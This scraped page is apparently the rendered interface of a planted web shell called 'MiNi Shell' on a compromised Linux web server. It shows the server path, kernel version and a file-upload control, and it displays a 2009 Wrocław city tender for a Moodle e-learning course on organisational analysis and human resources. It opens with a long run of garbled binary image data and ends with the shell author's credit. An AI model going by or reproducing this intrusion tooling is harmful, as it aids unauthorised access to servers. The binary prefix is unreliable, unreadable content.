JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090703/104671-N-2009.html

<p class="kh_header"><b>Wrocław: Utworzenie kursu e-learning Analiza organizacyjna i zasoby ludzkie</b><br>
<b>Numer ogłoszenia: 104671 - 2009; data zamieszczenia: 03.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wrocław Urząd Miejski Wrocławia , pl. Nowy Targ 1/8, 50-141 Wrocław, woj. dolnośląskie, tel. 071 7779230, 7779231, faks 071 7779229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie kursu e-learning Analiza organizacyjna i zasoby ludzkie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest utworzenie kursu Analiza organizacyjna i zasoby ludzkie na platformie e-learning w oparciu o silnik Moodle na warunkach określonych 
w SIWZ i zgodnie z przedłożoną ofertą, zwanym w dalszej części Kursem 
e-learning.



2. Szczegółowy zakres wykonywanych prac:
I. Kurs Analiza organizacyjna i zasoby ludzkie powstanie na podstawie materiałów przesłanych przez Urząd  (około 130 stron A4).
Kurs składać się będzie z 6 modułów:
1. Istota motywowania i jego znaczenie w procesie pracy oraz ocena pracowników. 
2. Zarządzanie kadrami jako dziedzina wiedzy i praktyki gospodarczej.
3. Style kierowania i wyznaczniki ich efektywności. 
4. Zarządzanie w społeczeństwie postindustialnym.
5. Struktura organizacyjna - istota, badanie.
6. Struktury organizacyjne jednostek administracji publicznej 
II. Każdy moduł stanowi całość tematyczną i powinien obejmować następujące elementy:
1)	opracowanie scenariusza kursu,
2)	opracowanie koncepcji metodologicznej,
3)	redakcję tekstów w przystępnej dla uczestników kursu formie,
4)	przygotowanie informatyczne komponentów multimedialnych 
i poszczególnych ekranów kursu (redakcja treści, multimedia, podstawowe elementy tekstowe powinny być udźwiękowione),
5)	opracowanie słownika (możliwość dodawania komentarzy do słownika). Wszystkie słowa znajdujące się w słowniku muszą być zaznaczone 
w kursie. Po kliknięciu na słowo ze słowniczka znajdujące się na stronie kursu powinien zostać automatycznie uruchomiony słowniczek otwarty na stronie wybranego słowa,
6)	elementy sprawdzające wiedzę studenta (np. zadania, testy),
7)	materiały  aktywizujące i wspomagające samodzielną naukę studenta 
(np. ćwiczenia i quizy),
8)	opracowanie interaktywnego testu końcowego po każdym module,
9)	opracowanie dokumentu w formacie PDF, zawierającego opis wszystkich stron kursu. Dokument ma zawierać zrzut ekranu każdej strony oraz opis zadań interaktywnych ze wskazaniem prawidłowej odpowiedzi (element dokumentacji szkolenia).
III. Warunki Ogólne:
1.	Kurs ma być zrealizowany w języku polskim.
2.	Kurs ma się składać z zaprojektowanych i wykonanych ekranów merytorycznych, opracowanych metodycznie, w tym:
a.	ekranów informacyjnych zawierających tekst i grafikę;
b.	ekranów ćwiczeniowych zawierających pytania testowe (w trakcie trwanie modułów),
c.	w zależności od przyjętej formy kursu ekran informacyjny może być zarazem ekranem ćwiczeniowym.
3.	Zamawiający zastrzega sobie prawo wglądu i korekty opracowanego scenariusza oraz tekstów.
4.	Kursant ma możliwość drukowania materiałów w każdym module - opcja drukuj na każdej stronie kursu.
5.	Pytania testowe  i ćwiczeniowe powinny być różnorodne i interaktywne np.:
a.	zadania typu Pole wielokrotnego wyboru - kursant może wybrać kilka odpowiedzi. Odpowiedzi do wyboru są wyświetlane w losowej kolejności, uniemożliwiając kursantom zapamiętywanie, na której pozycji była poprawna odpowiedź,
b.	zadania typu Opcja wyboru - kursant może wybrać jedną odpowiedź. Odpowiedzi do wyboru są wyświetlane w losowej kolejności, uniemożliwiając kursantom zapamiętywanie, na której pozycji była poprawna odpowiedź,
c.	zadania typu Prawda-Fałsz,
d.	quizy,
e.	inne.
6.	Opracowanie Informatora o kursie, dostępnego przed przystąpieniem i w czasie trwania kursu, zawierającego informacje na temat:
a.	zawartości kursu,
b.	wymagań sprzętowych,
c.	warunków, jakie powinien spełniać uczestnik kursu,
d.	wstępne szkolenie z zakresu nawigacji (sposobu poruszania się po kursie)
7. Przygotowanie dokumentacji szkolenia.
IV. Warunki Techniczne:
1.	Kurs e-learning musi być gotowy do importu na platformę e-learningową opartą 
o silnik Moodle. 
2.	Kurs musi być przygotowany w kodowani u UTF8.
3.	Minimalna rozdzielczość monitora, przy której kurs musi w pełni funkcjonalnie  działać: 800x600 pikseli, 1024x768.
4.	Wymagane oprogramowanie użytkowe: standardowa przeglądarka internetowa (Microsoft Internet Explorer, Mozilla, Opera, Netscape).
5.	Kurs ma być dostępny dla użytkowników po zalogowaniu się. 

Ponadto:
a)	Wykonawca dostarczy gotowy przedmiot umowy do siedziby Zamawiającego na płytach CD oraz w postaci wydruku całości kursu.
b)	Wykonawca udzieli gwarancji na wykonany przedmiot umowy na okres 12 miesięcy od momentu podpisania protokołu odbioru przedmiotu umowy.
c)	Wykonawca zobowiązuje się do usunięcia usterek ujawnionych po przejęciu protokołem odbioru przedmiotu umowy w terminie do 7 dni od chwili otrzymania zgłoszenia powstałych wad.

Pozostałe warunki realizacji zamówienia zawarte są w Projekcie umowy.

Zamawiający nie przewiduje możliwości zmian postanowień zawartej umowy w stosunku do treści oferty.
Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych: zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy, zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami.

Wykonawca jest zobowiązany do wskazania w ofercie części zamówienia, którą zamierza powierzyć podwykonawcom (art. 36 ust. 4 ustawy Pzp)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 56.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 2 000,00 zł, słownie: dwa tysiące złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego ubiegać się mogą Wykonawcy, którzy:

1.	spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych,

2.	zrealizowali w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania                        o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy 
- w tym okresie, co najmniej dwa kursy e-learning przygotowane do funkcjonowania 
na platformie e-learning opartej o silnik Moodle, w tym jeden kurs o wartości co najmniej 86 000 zł. brutto oraz udokumentują, że usługi te zostały wykonane należycie.
Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu:
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana według formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla udokumentowania spełniania wymaganych warunków udziału w postępowaniu 
do Formularza oferty Wykonawcy muszą dołączyć:

w formie oryginału:

1. oświadczenie z art. 22 ust. 1 ustawy Pzp,

w formie oryginału lub kserokopii poświadczonej ,,za zgodność z oryginałem przez Wykonawcę (§ 4.1. Rozporządzenia w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane), opatrzonej imienną pieczątką  i własnoręcznym podpisem:

2.	wykaz zrealizowanych z należytą starannością w ciągu ostatnich trzech lat (jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) przed dniem wszczęcia postępowania o udzielenie zamówienia, co najmniej dwóch kursów e-learning przygotowanych do funkcjonowania na platformie e-learning opartej o silnik Moodle, 
w tym jeden kurs o wartości co najmniej 86 000 zł. brutto, z podaniem ich wartości, przedmiotu, dat wykonania i zamawiających,

Fakt należytego wykonania usług musi być potwierdzony odpowiednimi dokumentami dołączonymi do wykazu.

3.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Odpis (zaświadczenie) musi zawierać aktualny wykaz osób uprawnionych do reprezentowania Wykonawcy. Wykonawcy, którzy dokonali zmian w zakresie organów zarządzających, które nie są uwidocznione w dokumencie rejestrowym winni złożyć dokumenty potwierdzające powołanie nowych osób w skład organu zarządzającego (np. uchwała w sprawie powołania określonej osoby).

A)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 3 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
B) Dokument, o którym mowa w pkt A) powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
C) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa w pkt A), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia powyższego pkt B) stosuje się odpowiednio.
WYKONAWCY UBIEGAJĄCY SIĘ WSPÓLNIE O ZAMÓWIENIE:
a)	Dokument wymieniony w pkt. 3 musi być złożony odrębnie przez każdego 
z Wykonawców.
b)	Dokument wymieniony w pkt  2 mogą Wykonawcy złożyć jako jeden wspólny dla wszystkich Wykonawców ze wskazaniem w tzw. ,,uwagach, którego wykonawcy 
i w jakim zakresie ów dokument dotyczy.
Warunki dotyczące doświadczenia badane będą łącznie.
c)	Oświadczenie wymienione w pkt. 1 Wykonawcy składają wspólnie na jednym dokumencie (oświadczenie podpisane przez pełnomocnika lub każdego 
z Wykonawców).
d)	W Formularzu ofertowym w części dotyczącej wskazania Wykonawcy i dotyczących go danych (m.in. danych adresowych) - należy wpisać wszystkich Wykonawców i wszystkie dotyczące ich dane (m.in. dane adresowe).
e)	Do oferty musi być załączone - pełnomocnictwo do reprezentowania Wykonawców                  w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu                       i zawarcia umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Wrocławia  
Wydział Zamówień Publicznych,
51-163 Wrocław
al. M. Kromera 44
pok. 339 (III piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2009 godzina 10:00, miejsce: Urząd Miejski Wrocławia  
Wydział Zamówień Publicznych,
51-163 Wrocław
al. M. Kromera 44
pok. 339 (III piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com